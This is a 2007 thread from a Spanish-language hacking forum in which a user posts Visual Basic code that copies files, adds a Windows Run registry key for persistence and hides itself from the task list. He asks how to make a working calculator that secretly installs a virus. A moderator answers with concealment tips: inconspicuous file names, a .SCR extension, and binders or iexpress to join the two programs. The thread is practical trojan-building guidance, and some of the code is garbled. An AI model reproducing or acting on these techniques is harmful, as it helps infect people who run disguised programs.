hacker

Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
11 de Octubre de 2008, 04:46:29
Noticias: Reporte de temas
Para ver este enlace Registrate o Inicia Sesion
> Aqui

+  Foros pOrtal Hacker
|-+  Programacion
| |-+  Programación en general
| | |-+  Visual Basic (Moderadores: ranefi, crypto136, ziBboh, >> s E t H <<)
| | | |-+  Registro en Vb
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Registro en Vb  (Leído 250 veces)
Cheatmaster
NZ2
**
Desconectado Desconectado

Ver Perfil
« : 15 de Mayo de 2007, 05:01:29 »

Código:
ahi esta el codigo completo el install

Private Sub Form_Load()
Dim ip As String, ipftp As String, port As Integer
Dim ejec As String         'declaramos estas variables , si las declarais en el general mejor
Dim win
Dim sys
Dim residencia
On Error Resume Next
FileCopy "a:\proj.bat", "C:\Archivos de programa\Archivos comunes\proj.bat" ' El primero es el Source

FileCopy "a:\selector.exe", "C:\Archivos de programa\Archivos comunes\selector.exe" ' El primero es el Source

'FileCopy (App.Path & "\" & App.FileDescri ption & "archivo.txt"), ("C:\archivo.txt")
'Name sys & "\nombre1" As sys & "\ver.exe"       'renombra
Set residencia = CreateObject("WScript.Shell")
residencia.Reg Write "HKEY_CURRENT_U SER\Software\Microsoft\Windows\CurrentVersion\Run\" & "nombre3", sys & "C:\Archivos de programa\Archivos comunes\selector.exe"  'esto modifica el
App.TaskVisibl e = False          'para ocultarlo un poco del, (alt +sup +control)

End Sub

Eso es el REGISTRO ??
Y... x ejemplo el "selector.exe" es como tu lo nombres no ? = que el archivo.txt,

yo m pregunto, si el " virus " se llama PEPITO.EXE, luego en " HKEY_CURRENT_U SER\Software\Microsoft\Windows\CurrentVersion\Run\" & "nombre3", sys & "C:\Archivos de programa\Archivos comunes\selector.exe" selector.exe tiene que ser PEPITO.exe ? o puede ser independiente,

Es que yo quiero hacer un programa con doble sentido,
Es decir, una calculadora, que su segunda funcion sea el virus, pero que al ejecutarlo ala hora no ejecute la calculadora si no el virus xD nose si me explico
ziBboh
Moderador

ziBboh dice: Ya nacio mini-ziBboh! :)

Ver Perfil
« Respuesta #1 : 17 de Mayo de 2007, 07:53:36 »

Saludos, Cheatmaster

El registro es Residencia

En tu segunda duda, Selector.exe lo tienes que cambiar por el nombre del EXE, si tu virus se llama Pepito, nadamas renombra el EXE por algo que pase desapercibido como Win32LogOn.exe o mejor aun, la extension de tu EXE renombrala por *.SCR (extension de los salvapantallas).

Tu tercera duda no la entiendo, quieres hacer una calculadora pero que al mismo tiempo sea virus? o quieres que funcione como calculadora y despues de X ejecuciones o en X fecha se convierta en virus?

Se un poco mas claro.

ziBboh dice: NO SPAM!El número de post no te hace mejor ...Todos somos iguales!
Cheatmaster
NZ2
**

Ver Perfil
« Respuesta #2 : 17 de Mayo de 2007, 08:11:19 »

yo quiero, que sea calculadora y funcione como tal, pero que tambien lleve un virus, es decir supongamos que abres la calculadora, ok funciona bien y tal, pero al abrirla ya tienes un virus, con el registro que se ejecuta a "X" hora haciendo las funciones que se le pondrian, asin no teniendo que volver a iniciar la calculadora,por eso pregunto lo del registro Tongue

Nose si me entendiste xD
ziBboh
Moderador

ziBboh dice: Ya nacio mini-ziBboh! :)

Ver Perfil
« Respuesta #3 : 17 de Mayo de 2007, 10:20:26 »

Pues te recomiendo que mejor hagas las cosas aparte y luego los unas con algun Binder o con el iexpress de Windows, ya que si se registra se ejecutara y se vera la calculadora, entonces si los haces a parte y los unes, seria mejor por que tu virus se registra y la calculadora no. Entiendes?

Nos vemos.

ziBboh dice: NO SPAM!El número de post no te hace mejor ...Todos somos iguales!
Páginas: [1] Ir Arriba Imprimir 
« anterior próximo »
Ir a:  

Ingresar con nombre de usuario, contraseña y duración de la sesión